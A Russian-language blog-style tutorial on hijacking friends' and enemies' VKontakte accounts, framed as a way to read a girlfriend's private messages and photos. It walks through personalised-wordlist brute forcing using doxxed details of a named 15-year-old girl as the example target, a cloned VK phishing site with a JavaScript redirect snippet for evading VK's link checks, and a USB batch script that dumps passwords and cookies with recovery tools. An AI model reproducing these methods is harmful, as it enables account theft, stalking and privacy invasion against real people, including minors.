Взлом ВК
Hut of darknessКак часто вы ловили себя на мысли о том, что узнать секреты своей подружки было бы неплохой идеей? Как часто хотелось ворваться в её личную жизнь, нагло распахнув двери интимного барьера?
Было? Да конечно было. Человеческая природа устроена так, что мы хотим знать всё обо всех. И против заложенных в нас рефлексов не попрёшь.
А где в 21 веке подавляющее число молодёжи хранит свои тайны в виде компрометирующих переписок и фоток? Очевидно, в такой небезызвестной социальной сети, как Вконтакте.
Многим эта социальная сеть уже давно стала вторым домом. Мы проводим часы напролёт, погружаясь в её бездну.
Звучит грустно. Но, к счастью, статья о другом.
Сегодня я научу вас взламывать страницы вк ваших друзей и неприятелей.
Разумеется, все представленные ниже способы не дают 100%-й гарантии того, что вы сумеете получить доступ к аккаунту, однако при правильном подходе процент успешного входа довольно высок.
Хватит слов, переходим к действиям. Погнали!
Брутфорс
Наверняка все вы слышали про такую штуку, как брутфорс. Тем, кто в танке, поясню - это метод, заключающийся в подборе пароля.
"Чувак, какой подбор пароля, 21 век на дворе!"
Спокойно.
Если вы считаете, что в наше время уже никто не ставит такие банальные пароли, как "123456" или "qwerty123321", то могу сказать, что вы ошибаетесь. Ставят, ещё как. В основном, конечно, это люди бальзаковского возраста, которым лень запоминать сложные комбинации, состоящие из больших и малых букв, спецсимволов и цифр. И вряд ли это именно те люди, которых мы хотим взломать.
Окей, а что, если использовать в качестве перебора не банальные пароли, а индивидуальный словарь?
Это такой словарь, в котором находятся все возможные пароли, образованные от нескольких фраз/слов, связанных с человеком.
Сейчас всё объясню.
В первую очередь, нам необходимо добыть максимальное количество информации о человеке - его номер телефона, ФИО, возраст, увлечения. Для этого можете воспользоваться моей статьёй, размещённой на этом канале под названием "Пробив от А до Я".
Далее создаём словарь, в который добавляем все известные нам данные. 1 переменная - 1 строка.
Например, нашу жертву зовут Панкратова Анастасия Сергеевна, ей 15, и это всё, что мы о ней знаем. Создаём словарь:
Pankratova
Anastasia
Nastya
Sergeevna
15
Далее необходимо создать скрипт, который скомбинировал бы все эти переменные самыми разнообразными способами.
Для начала установим среду разработки под названием Python (как это сделать, а также как запустить представленный ниже скрипт, думаю, поймёте. Гуглить ведь все умеют?).
Пишем скрипт:
https://note-pad.net/ru/read/d5c24e9dbfa6748951c00d52063b4900
На выходе вы получите файл, содержащий в себе тысячи строк со всевозможными паролями.
Далее нам нужна программа, которая за нас будет осуществлять процесс подбора. Пользуемся.
https://note-pad.net/ru/read/fa25fc6d2a0c950e82e0a56152015ee3
Фишинг
Этот способ гораздо действеннее, и именно он сейчас является основным у злоумышленников, крадущих аккаунты вк. В чем его суть?
Мы создаём сайт, полностью идентичный интерфейсу вк. Далее пишем нашей жертве с фейкового аккаунта что-то вроде: "Вау, это твоя фотка?" с ссылкой на наш сайт. Перейдя по ней, жертва столкнется с формой ввода логина и пароля, и если она не имеет привычки смотреть на адрес сайта - то введёт их, не подозревая ни о чем. А данные прилетят вам.
Перейдём к реализации.
Что нам нужно? Фишинговый сайт и хостинг.
В первую очередь, качаем сайт (https://www.sendspace.com/file/1j1mti).
Далее заливаем его на хостинг, подключив к нему домен (Кто не знает, как это сделать - Гугл в помощь).
Потом регистрируем аккаунт на Ucoz.
Заходим в панель управления - Дизайн - Редактор - Страницы сайта и под тегом head вставляем скрипт:
<script type="text/javascript">
location.replace("http://сайт куда отправить");
</script>
Этот скрипт автоматически перенаправляет пользователя с нашего ucoz сайта на фишинг сайт.
Зачем это нужно? Чтобы вк не блокировал пользователю переход по подозрительной ссылке.
Вот и все. В конце, используя свою фантазию и красноречие, заставляем нашу жертву перейти по ссылке и ввести логин и пароль.
Кража пароля физически
Нет, нам не придется привязывать жертву к столбу, требуя предоставить нам пароль. Способ намного гуманней.
Если у вас есть возможность на 10-15 секунд засунуть в компьютер человека, которого вы хотите взломать, флешку - то считайте, что все его данные у вас в кармане.
Приступим к реализации.
Для начала нам понадобится флешка. Самая обычная флешка.
Далее качаем все программы из этого списка:
MessenPass
Mail PassView
Protected Storage PassView
Dialupass
BulletsPassView
Network Password Recovery
SniffPass Password Sniffer
RouterPassView
PstPassword
WebBrowserPassView
WirelessKeyView
Remote Desktop PassView
VNCPassView
Потом открываем блокнот, и вставляем код:
https://note-pad.net/ru/read/9806e252f5022ef204c7dfc60a7c6036
Сохранив блокнот как backup.bat, переносим его на флешку.
Вот и все. Теперь, как только вы вставите в чужой компьютер эту флешку и запустите backup.bat - все пароли, куки и т.д сохранятся в вашем txt - файле.
Итог
Обладая достаточными навыками социальной инженерии, вкупе с небольшими техническими знаниями, возможно всё. В том числе и возможно взломать аккаунт любого человека.